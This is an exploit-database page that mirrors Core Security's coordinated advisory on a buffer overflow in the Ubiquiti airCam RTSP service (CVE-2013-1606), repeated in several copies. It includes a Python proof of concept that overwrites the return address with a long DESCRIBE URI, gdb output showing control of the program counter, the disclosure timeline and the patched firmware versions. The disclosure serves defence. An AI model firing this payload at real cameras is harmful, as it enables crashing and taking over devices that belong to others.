Search...

Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow

2013-06-12T00:00:00

ID 1337DAY-ID-20881
Type zdt
Reporter Core Security
Modified 2013-06-12T00:00:00

Description

Exploit for hardware platform in category dos / poc

                                        
                                            Buffer overflow in Ubiquiti airCam RTSP service
 
 
1. *Advisory Information*
 
Title: Buffer overflow in Ubiquiti airCam RTSP service
Advisory ID: CORE-2013-0430
Advisory URL:
http://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service
Date published: 2013-06-11
Date of last update: 2013-06-11
Vendors contacted: Ubiquiti
Release mode: Coordinated release
 
 
2. *Vulnerability Information*
 
Class: Classic buffer overflow [CWE-120]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1606
 
 
3. *Vulnerability Description*
 
The Ubiquiti [1] airCam RTSP service 'ubnt-streamer', has a buffer
overflow when parsing the URI of a RTSP request message. This bug allows
remote attackers to execute arbitrary code via RTSP request message.
 
 
4. *Vulnerable Packages*
 
   . Cameras Models: airCam, airCam Mini, airCam Dome.
   . Firmware Version Verified: AirCam v1.1.5.
   . Other devices are probably affected too, but they were not checked.
 
 
5. *Non-Vulnerable Packages*
 
   . firmware v1.2.0 (airVision 2.x platform).
   . firmware v1.1.6 (airVision 1.x platform).
 
6. *Vendor Information, Solutions and Workarounds*
 
Patched firmware versions can be downloaded from the Ubiquiti official
website [2], [3].
 
 
7. *Credits*
 
These vulnerabilities were discovered and researched by Andres Blanco
from Core Exploit Writers Team. The publication of this advisory was
coordinated by Fernando Miranda from Core Advisories Team.
 
 
8. *Technical Description / Proof of Concept Code*
 
 
/-----
#
# Author: Andres Blanco - CORE Security Technologies.
#
# The contents of this software are copyright (c) 2013 CORE Security and
(c) 2013 CoreLabs,
# and are licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 (United States)
# License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE.
#
 
import socket
 
class RtspRequest(object):
 
    def __init__(self, ip_address, port):
        self._ip_address = ip_address
        self._port = port
 
    def generate_request(self, method, uri, headers):
        data = ""
        data += "%s %s RTSP/1.0\r\n" % (method, uri)
        for item in headers:
            header = headers[item]
            data += "%s: %s\r\n" % (item, header)
        data += "\r\n"
        return data
 
    def send_request(self, data):
        sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sd.settimeout(15)
        sd.connect((self._ip_address, self._port))
        sd.send(data)
        resp = sd.recv(2048)
        sd.close()
        return resp
 
if __name__ == "__main__":
    ip = "192.168.100.1"
    anRtsp = RtspRequest(ip, 554)
    data = ""
    data += "A" * 271
    data += "\x78\x56\x34\x12"
    uri = "rtsp://%s/%s/live/ch00_0" % (ip, data)
    headers = { "CSeq" : "1" }
    req = anRtsp.generate_request("DESCRIBE", uri, headers)
    rsp = anRtsp.send_request(req)
-----/
 
Below the gdb session when executing the PoC.
 
/-----
AirCam.v1.1.5# ./gdb --pid 358
...
Attaching to process 358
 
warning: process 358 is a cloned process
Reading symbols from /bin/ubnt-streamer...(no debugging symbols
found)...done.
Reading symbols from /lib/libpthread.so.0...(no debugging symbols
found)...done.
...
0x401c60a0 in select () from /lib/libc.so.6
(gdb) c
Continuing.
 
Program received signal SIGSEGV, Segmentation fault.
0x12345678 in ?? ()
(gdb) info registers
r0             0x0      0
r1             0x1      1
r2             0xffffffff       4294967295
r3             0x1      1
r4             0x41414141       1094795585
r5             0x41414141       1094795585
r6             0x41414141       1094795585
r7             0xd7198  881048
r8             0x0      0
r9             0x0      0
r10            0xc6119  811289
r11            0xc625f  811615
r12            0x23     35
sp             0x40a7eaf0       0x40a7eaf0
lr             0x48d34  298292
pc             0x12345678       0x12345678
cpsr           0x20000010       536870928
(gdb) info stack
#0  0x12345678 in ?? ()
#1  0x00048d34 in ?? ()
#2  0x00048d34 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/50xw $sp-0x80
0x40a7ea70:     0x41414141      0x41414141      0x41414141      0x41414141
0x40a7ea80:     0x41414141      0x41414141      0x41414141      0x41414141
0x40a7ea90:     0x41414141      0x41414141      0x41414141      0x41414141
0x40a7eaa0:     0x41414141      0x41414141      0x41414141      0x41414141
0x40a7eab0:     0x41414141      0x41414141      0x41414141      0x41414141
0x40a7eac0:     0x41414141      0x41414141      0x41414141      0x41414141
0x40a7ead0:     0x41414141      0x41414141      0x41414141      0x41414141
0x40a7eae0:     0x41414141      0x41414141      0x41414141      0x12345678
0x40a7eaf0:     0x76696c2f      0x68632f65      0x305f3030      0x000d7100
0x40a7eb00:     0x000c6060      0x000c6119      0x00059340      0x000491a8
0x40a7eb10:     0x000d73f6      0x000c6267      0x00000001      0x000c6060
0x40a7eb20:     0x000c6119      0x00059340      0x000c6118      0x00049780
0x40a7eb30:     0x00000000      0x000c611c
-----/
 
 
9. *Report Timeline*
 
. 2013-05-02:
Core Security Technologies notifies the Ubiquiti team of the
vulnerability. Publication date is set for May 29th, 2013.
 
. 2013-05-02:
Vendor acknowledges the receipt of the email and asks for technical
details.
 
. 2013-05-02:
A draft report with technical details and a PoC sent to Ubiquiti team.
 
. 2013-05-03:
Vendor notifies that a new firmware version should address this
vulnerability. It will be released shortly to the alpha and beta community.
 
. 2013-05-06:
Core notifies that the advisory will be re-scheduled to be released when
patches are available to the alpha and beta community and asks for a
tentative release date.
 
. 2013-05-09:
Core asks for a status update regarding this vulnerability and a
tentative release date.
 
. 2013-05-13:
Vendor notifies the firmware is still in internal testing and the
release date will be confirmed in the following days.
 
. 2013-05-27:
Core notifies that there was no answer in the last 2 weeks regarding the
release date. Core also notifies that the advisory was re-scheduled for
Jun 4th, and asks for a clear timeline to justify keep delaying the
release.
 
. 2013-05-28:
Vendor notifies that the new firmware is almost done and a confirmed
date will be notified in the following days.
 
. 2013-05-29:
Core asks if a beta firmware is available for downloading.
 
. 2013-05-29:
Vendor notifies that they have a v1.1.6 build of the firmware which is
being tested internally and will be released very soon, probably this
week. However, it is not yet available on the ubnt.com/download site.
 
. 2013-05-29:
First release date missed.
 
. 2013-06-03:
Core asks for a status update.
 
. 2013-06-03:
Vendor notifies that they do not have a specific release date yet.
 
. 2013-06-11:
Vendor notifies that they released firmware 1.2.0 along with airVision 2
[2][3], and a public announcement will be made soon. Release of firmware
1.1.6 (for the airVision 1.x platform) has to be defined.
 
. 2013-06-11:
Advisory CORE-2013-0430 published.
 
 
10. *References*
 
[1] http://www.ubnt.com.
[2] Ubiquiti downloads http://www.ubnt.com/download#AirCam.
[3] Ubiquiti firmware v1.2.0
http://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin.
 
 
11. *About CoreLabs*
 
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
 
 
12. *About Core Security Technologies*
 
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
 
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
 
 
13. *Disclaimer*
 
The contents of this advisory are copyright (c) 2013 Core Security
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
 
 
14. *PGP/GPG Keys*
 
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

#  0day.today [2018-01-05]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-20881", "lastseen": "2018-01-05T17:08:31", "viewCount": 11, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 2, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2018-01-05T17:08:31", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1606"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29476", "SECURITYVULNS:VULN:13134"]}, {"type": "seebug", "idList": ["SSV:79784"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:CD3DBE0EB54758980B10BB811B72AB88"]}, {"type": "nessus", "idList": ["UBIQUITI_AIRCAM_1_2_0.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:26138"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121986"]}], "modified": "2018-01-05T17:08:31", "rev": 2}, "vulnersScore": 7.6}, "type": "zdt", "sourceHref": "https://0day.today/exploit/20881", "description": "Exploit for hardware platform in category dos / poc", "title": "Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow", "cvelist": ["CVE-2013-1606"], "sourceData": "Buffer overflow in Ubiquiti airCam RTSP service\r\n \r\n \r\n1. *Advisory Information*\r\n \r\nTitle: Buffer overflow in Ubiquiti airCam RTSP service\r\nAdvisory ID: CORE-2013-0430\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service\r\nDate published: 2013-06-11\r\nDate of last update: 2013-06-11\r\nVendors contacted: Ubiquiti\r\nRelease mode: Coordinated release\r\n \r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Classic buffer overflow [CWE-120]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1606\r\n \r\n \r\n3. *Vulnerability Description*\r\n \r\nThe Ubiquiti [1] airCam RTSP service 'ubnt-streamer', has a buffer\r\noverflow when parsing the URI of a RTSP request message. This bug allows\r\nremote attackers to execute arbitrary code via RTSP request message.\r\n \r\n \r\n4. *Vulnerable Packages*\r\n \r\n . Cameras Models: airCam, airCam Mini, airCam Dome.\r\n . Firmware Version Verified: AirCam v1.1.5.\r\n . Other devices are probably affected too, but they were not checked.\r\n \r\n \r\n5. *Non-Vulnerable Packages*\r\n \r\n . firmware v1.2.0 (airVision 2.x platform).\r\n . firmware v1.1.6 (airVision 1.x platform).\r\n \r\n6. *Vendor Information, Solutions and Workarounds*\r\n \r\nPatched firmware versions can be downloaded from the Ubiquiti official\r\nwebsite [2], [3].\r\n \r\n \r\n7. *Credits*\r\n \r\nThese vulnerabilities were discovered and researched by Andres Blanco\r\nfrom Core Exploit Writers Team. The publication of this advisory was\r\ncoordinated by Fernando Miranda from Core Advisories Team.\r\n \r\n \r\n8. *Technical Description / Proof of Concept Code*\r\n \r\n \r\n/-----\r\n#\r\n# Author: Andres Blanco - CORE Security Technologies.\r\n#\r\n# The contents of this software are copyright (c) 2013 CORE Security and\r\n(c) 2013 CoreLabs,\r\n# and are licensed under a Creative Commons Attribution Non-Commercial\r\nShare-Alike 3.0 (United States)\r\n# License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n#\r\n# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED\r\n# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE\r\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR\r\n# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF\r\n# THIS SOFTWARE.\r\n#\r\n \r\nimport socket\r\n \r\nclass RtspRequest(object):\r\n \r\n def __init__(self, ip_address, port):\r\n self._ip_address = ip_address\r\n self._port = port\r\n \r\n def generate_request(self, method, uri, headers):\r\n data = \"\"\r\n data += \"%s %s RTSP/1.0\\r\\n\" % (method, uri)\r\n for item in headers:\r\n header = headers[item]\r\n data += \"%s: %s\\r\\n\" % (item, header)\r\n data += \"\\r\\n\"\r\n return data\r\n \r\n def send_request(self, data):\r\n sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sd.settimeout(15)\r\n sd.connect((self._ip_address, self._port))\r\n sd.send(data)\r\n resp = sd.recv(2048)\r\n sd.close()\r\n return resp\r\n \r\nif __name__ == \"__main__\":\r\n ip = \"192.168.100.1\"\r\n anRtsp = RtspRequest(ip, 554)\r\n data = \"\"\r\n data += \"A\" * 271\r\n data += \"\\x78\\x56\\x34\\x12\"\r\n uri = \"rtsp://%s/%s/live/ch00_0\" % (ip, data)\r\n headers = { \"CSeq\" : \"1\" }\r\n req = anRtsp.generate_request(\"DESCRIBE\", uri, headers)\r\n rsp = anRtsp.send_request(req)\r\n-----/\r\n \r\nBelow the gdb session when executing the PoC.\r\n \r\n/-----\r\nAirCam.v1.1.5# ./gdb --pid 358\r\n...\r\nAttaching to process 358\r\n \r\nwarning: process 358 is a cloned process\r\nReading symbols from /bin/ubnt-streamer...(no debugging symbols\r\nfound)...done.\r\nReading symbols from /lib/libpthread.so.0...(no debugging symbols\r\nfound)...done.\r\n...\r\n0x401c60a0 in select () from /lib/libc.so.6\r\n(gdb) c\r\nContinuing.\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x12345678 in ?? ()\r\n(gdb) info registers\r\nr0 0x0 0\r\nr1 0x1 1\r\nr2 0xffffffff 4294967295\r\nr3 0x1 1\r\nr4 0x41414141 1094795585\r\nr5 0x41414141 1094795585\r\nr6 0x41414141 1094795585\r\nr7 0xd7198 881048\r\nr8 0x0 0\r\nr9 0x0 0\r\nr10 0xc6119 811289\r\nr11 0xc625f 811615\r\nr12 0x23 35\r\nsp 0x40a7eaf0 0x40a7eaf0\r\nlr 0x48d34 298292\r\npc 0x12345678 0x12345678\r\ncpsr 0x20000010 536870928\r\n(gdb) info stack\r\n#0 0x12345678 in ?? ()\r\n#1 0x00048d34 in ?? ()\r\n#2 0x00048d34 in ?? ()\r\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\r\n(gdb) x/50xw $sp-0x80\r\n0x40a7ea70: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ea80: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ea90: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eaa0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eab0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eac0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7ead0: 0x41414141 0x41414141 0x41414141 0x41414141\r\n0x40a7eae0: 0x41414141 0x41414141 0x41414141 0x12345678\r\n0x40a7eaf0: 0x76696c2f 0x68632f65 0x305f3030 0x000d7100\r\n0x40a7eb00: 0x000c6060 0x000c6119 0x00059340 0x000491a8\r\n0x40a7eb10: 0x000d73f6 0x000c6267 0x00000001 0x000c6060\r\n0x40a7eb20: 0x000c6119 0x00059340 0x000c6118 0x00049780\r\n0x40a7eb30: 0x00000000 0x000c611c\r\n-----/\r\n \r\n \r\n9. *Report Timeline*\r\n \r\n. 2013-05-02:\r\nCore Security Technologies notifies the Ubiquiti team of the\r\nvulnerability. Publication date is set for May 29th, 2013.\r\n \r\n. 2013-05-02:\r\nVendor acknowledges the receipt of the email and asks for technical\r\ndetails.\r\n \r\n. 2013-05-02:\r\nA draft report with technical details and a PoC sent to Ubiquiti team.\r\n \r\n. 2013-05-03:\r\nVendor notifies that a new firmware version should address this\r\nvulnerability. It will be released shortly to the alpha and beta community.\r\n \r\n. 2013-05-06:\r\nCore notifies that the advisory will be re-scheduled to be released when\r\npatches are available to the alpha and beta community and asks for a\r\ntentative release date.\r\n \r\n. 2013-05-09:\r\nCore asks for a status update regarding this vulnerability and a\r\ntentative release date.\r\n \r\n. 2013-05-13:\r\nVendor notifies the firmware is still in internal testing and the\r\nrelease date will be confirmed in the following days.\r\n \r\n. 2013-05-27:\r\nCore notifies that there was no answer in the last 2 weeks regarding the\r\nrelease date. Core also notifies that the advisory was re-scheduled for\r\nJun 4th, and asks for a clear timeline to justify keep delaying the\r\nrelease.\r\n \r\n. 2013-05-28:\r\nVendor notifies that the new firmware is almost done and a confirmed\r\ndate will be notified in the following days.\r\n \r\n. 2013-05-29:\r\nCore asks if a beta firmware is available for downloading.\r\n \r\n. 2013-05-29:\r\nVendor notifies that they have a v1.1.6 build of the firmware which is\r\nbeing tested internally and will be released very soon, probably this\r\nweek. However, it is not yet available on the ubnt.com/download site.\r\n \r\n. 2013-05-29:\r\nFirst release date missed.\r\n \r\n. 2013-06-03:\r\nCore asks for a status update.\r\n \r\n. 2013-06-03:\r\nVendor notifies that they do not have a specific release date yet.\r\n \r\n. 2013-06-11:\r\nVendor notifies that they released firmware 1.2.0 along with airVision 2\r\n[2][3], and a public announcement will be made soon. Release of firmware\r\n1.1.6 (for the airVision 1.x platform) has to be defined.\r\n \r\n. 2013-06-11:\r\nAdvisory CORE-2013-0430 published.\r\n \r\n \r\n10. *References*\r\n \r\n[1] http://www.ubnt.com.\r\n[2] Ubiquiti downloads http://www.ubnt.com/download#AirCam.\r\n[3] Ubiquiti firmware v1.2.0\r\nhttp://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin.\r\n \r\n \r\n11. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n \r\n \r\n12. *About Core Security Technologies*\r\n \r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n \r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n \r\n \r\n13. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n \r\n \r\n14. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n\n# 0day.today [2018-01-05] #", "published": "2013-06-12T00:00:00", "references": [], "reporter": "Core Security", "modified": "2013-06-12T00:00:00", "href": "https://0day.today/exploit/description/20881"}

{"cve": [{"lastseen": "2020-12-09T19:52:39", "description": "Buffer overflow in the ubnt-streamer RTSP service on the Ubiquiti UBNT AirCam with airVision firmware before 1.1.6 allows remote attackers to execute arbitrary code via a long rtsp: URI in a DESCRIBE request.\nPer: http://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service\r\n\r\n'Vulnerable Packages\r\n\r\n Cameras Models: airCam, airCam Mini, airCam Dome.\r\n Firmware Version Verified: AirCam v1.1.5.'", "edition": 6, "cvss3": {}, "published": "2013-07-18T16:51:00", "title": "CVE-2013-1606", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1606"], "modified": "2019-06-10T18:34:00", "cpe": ["cpe:/h:ui:aircam_dome:-", "cpe:/h:ui:aircam_mini:-", "cpe:/o:ui:airvision_firmware:1.1.5", "cpe:/h:ui:aircam:-"], "id": "CVE-2013-1606", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1606", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:ui:airvision_firmware:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:h:ui:aircam_dome:-:*:*:*:*:*:*:*", "cpe:2.3:h:ui:aircam_mini:-:*:*:*:*:*:*:*", "cpe:2.3:h:ui:aircam:-:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:23:10", "description": "", "published": "2013-06-12T00:00:00", "type": "packetstorm", "title": "Ubiquiti airCam RTSP Service Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1606"], "modified": "2013-06-12T00:00:00", "id": "PACKETSTORM:121986", "href": "https://packetstormsecurity.com/files/121986/Ubiquiti-airCam-RTSP-Service-Buffer-Overflow.html", "sourceData": "`Core Security - Corelabs Advisory \nhttp://corelabs.coresecurity.com \n \nBuffer overflow in Ubiquiti airCam RTSP service \n \n \n1. *Advisory Information* \n \nTitle: Buffer overflow in Ubiquiti airCam RTSP service \nAdvisory ID: CORE-2013-0430 \nAdvisory URL: \nhttp://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service \nDate published: 2013-06-11 \nDate of last update: 2013-06-11 \nVendors contacted: Ubiquiti \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Classic buffer overflow [CWE-120] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2013-1606 \n \n \n3. *Vulnerability Description* \n \nThe Ubiquiti [1] airCam RTSP service 'ubnt-streamer', has a buffer \noverflow when parsing the URI of a RTSP request message. This bug allows \nremote attackers to execute arbitrary code via RTSP request message. \n \n \n4. *Vulnerable Packages* \n \n. Cameras Models: airCam, airCam Mini, airCam Dome. \n. Firmware Version Verified: AirCam v1.1.5. \n. Other devices are probably affected too, but they were not checked. \n \n \n5. *Non-Vulnerable Packages* \n \n. firmware v1.2.0 (airVision 2.x platform). \n. firmware v1.1.6 (airVision 1.x platform). \n \n6. *Vendor Information, Solutions and Workarounds* \n \nPatched firmware versions can be downloaded from the Ubiquiti official \nwebsite [2], [3]. \n \n \n7. *Credits* \n \nThese vulnerabilities were discovered and researched by Andres Blanco \nfrom Core Exploit Writers Team. The publication of this advisory was \ncoordinated by Fernando Miranda from Core Advisories Team. \n \n \n8. *Technical Description / Proof of Concept Code* \n \n \n/----- \n# \n# Author: Andres Blanco - CORE Security Technologies. \n# \n# The contents of this software are copyright (c) 2013 CORE Security and \n(c) 2013 CoreLabs, \n# and are licensed under a Creative Commons Attribution Non-Commercial \nShare-Alike 3.0 (United States) \n# License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n# \n# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED \n# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE \n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR \n# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF \n# THIS SOFTWARE. \n# \n \nimport socket \n \nclass RtspRequest(object): \n \ndef __init__(self, ip_address, port): \nself._ip_address = ip_address \nself._port = port \n \ndef generate_request(self, method, uri, headers): \ndata = \"\" \ndata += \"%s %s RTSP/1.0\\r\\n\" % (method, uri) \nfor item in headers: \nheader = headers[item] \ndata += \"%s: %s\\r\\n\" % (item, header) \ndata += \"\\r\\n\" \nreturn data \n \ndef send_request(self, data): \nsd = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsd.settimeout(15) \nsd.connect((self._ip_address, self._port)) \nsd.send(data) \nresp = sd.recv(2048) \nsd.close() \nreturn resp \n \nif __name__ == \"__main__\": \nip = \"192.168.100.1\" \nanRtsp = RtspRequest(ip, 554) \ndata = \"\" \ndata += \"A\" * 271 \ndata += \"\\x78\\x56\\x34\\x12\" \nuri = \"rtsp://%s/%s/live/ch00_0\" % (ip, data) \nheaders = { \"CSeq\" : \"1\" } \nreq = anRtsp.generate_request(\"DESCRIBE\", uri, headers) \nrsp = anRtsp.send_request(req) \n-----/ \n \nBelow the gdb session when executing the PoC. \n \n/----- \nAirCam.v1.1.5# ./gdb --pid 358 \n... \nAttaching to process 358 \n \nwarning: process 358 is a cloned process \nReading symbols from /bin/ubnt-streamer...(no debugging symbols \nfound)...done. \nReading symbols from /lib/libpthread.so.0...(no debugging symbols \nfound)...done. \n... \n0x401c60a0 in select () from /lib/libc.so.6 \n(gdb) c \nContinuing. \n \nProgram received signal SIGSEGV, Segmentation fault. \n0x12345678 in ?? () \n(gdb) info registers \nr0 0x0 0 \nr1 0x1 1 \nr2 0xffffffff 4294967295 \nr3 0x1 1 \nr4 0x41414141 1094795585 \nr5 0x41414141 1094795585 \nr6 0x41414141 1094795585 \nr7 0xd7198 881048 \nr8 0x0 0 \nr9 0x0 0 \nr10 0xc6119 811289 \nr11 0xc625f 811615 \nr12 0x23 35 \nsp 0x40a7eaf0 0x40a7eaf0 \nlr 0x48d34 298292 \npc 0x12345678 0x12345678 \ncpsr 0x20000010 536870928 \n(gdb) info stack \n#0 0x12345678 in ?? () \n#1 0x00048d34 in ?? () \n#2 0x00048d34 in ?? () \nBacktrace stopped: previous frame identical to this frame (corrupt stack?) \n(gdb) x/50xw $sp-0x80 \n0x40a7ea70: 0x41414141 0x41414141 0x41414141 0x41414141 \n0x40a7ea80: 0x41414141 0x41414141 0x41414141 0x41414141 \n0x40a7ea90: 0x41414141 0x41414141 0x41414141 0x41414141 \n0x40a7eaa0: 0x41414141 0x41414141 0x41414141 0x41414141 \n0x40a7eab0: 0x41414141 0x41414141 0x41414141 0x41414141 \n0x40a7eac0: 0x41414141 0x41414141 0x41414141 0x41414141 \n0x40a7ead0: 0x41414141 0x41414141 0x41414141 0x41414141 \n0x40a7eae0: 0x41414141 0x41414141 0x41414141 0x12345678 \n0x40a7eaf0: 0x76696c2f 0x68632f65 0x305f3030 0x000d7100 \n0x40a7eb00: 0x000c6060 0x000c6119 0x00059340 0x000491a8 \n0x40a7eb10: 0x000d73f6 0x000c6267 0x00000001 0x000c6060 \n0x40a7eb20: 0x000c6119 0x00059340 0x000c6118 0x00049780 \n0x40a7eb30: 0x00000000 0x000c611c \n-----/ \n \n \n9. *Report Timeline* \n \n. 2013-05-02: \nCore Security Technologies notifies the Ubiquiti team of the \nvulnerability. Publication date is set for May 29th, 2013. \n \n. 2013-05-02: \nVendor acknowledges the receipt of the email and asks for technical \ndetails. \n \n. 2013-05-02: \nA draft report with technical details and a PoC sent to Ubiquiti team. \n \n. 2013-05-03: \nVendor notifies that a new firmware version should address this \nvulnerability. It will be released shortly to the alpha and beta community. \n \n. 2013-05-06: \nCore notifies that the advisory will be re-scheduled to be released when \npatches are available to the alpha and beta community and asks for a \ntentative release date. \n \n. 2013-05-09: \nCore asks for a status update regarding this vulnerability and a \ntentative release date. \n \n. 2013-05-13: \nVendor notifies the firmware is still in internal testing and the \nrelease date will be confirmed in the following days. \n \n. 2013-05-27: \nCore notifies that there was no answer in the last 2 weeks regarding the \nrelease date. Core also notifies that the advisory was re-scheduled for \nJun 4th, and asks for a clear timeline to justify keep delaying the \nrelease. \n \n. 2013-05-28: \nVendor notifies that the new firmware is almost done and a confirmed \ndate will be notified in the following days. \n \n. 2013-05-29: \nCore asks if a beta firmware is available for downloading. \n \n. 2013-05-29: \nVendor notifies that they have a v1.1.6 build of the firmware which is \nbeing tested internally and will be released very soon, probably this \nweek. However, it is not yet available on the ubnt.com/download site. \n \n. 2013-05-29: \nFirst release date missed. \n \n. 2013-06-03: \nCore asks for a status update. \n \n. 2013-06-03: \nVendor notifies that they do not have a specific release date yet. \n \n. 2013-06-11: \nVendor notifies that they released firmware 1.2.0 along with airVision 2 \n[2][3], and a public announcement will be made soon. Release of firmware \n1.1.6 (for the airVision 1.x platform) has to be defined. \n \n. 2013-06-11: \nAdvisory CORE-2013-0430 published. \n \n \n10. *References* \n \n[1] http://www.ubnt.com. \n[2] Ubiquiti downloads http://www.ubnt.com/download#AirCam. \n[3] Ubiquiti firmware v1.2.0 \nhttp://www.ubnt.com/downloads/AirCam-v1.2.0.build17961.bin. \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security 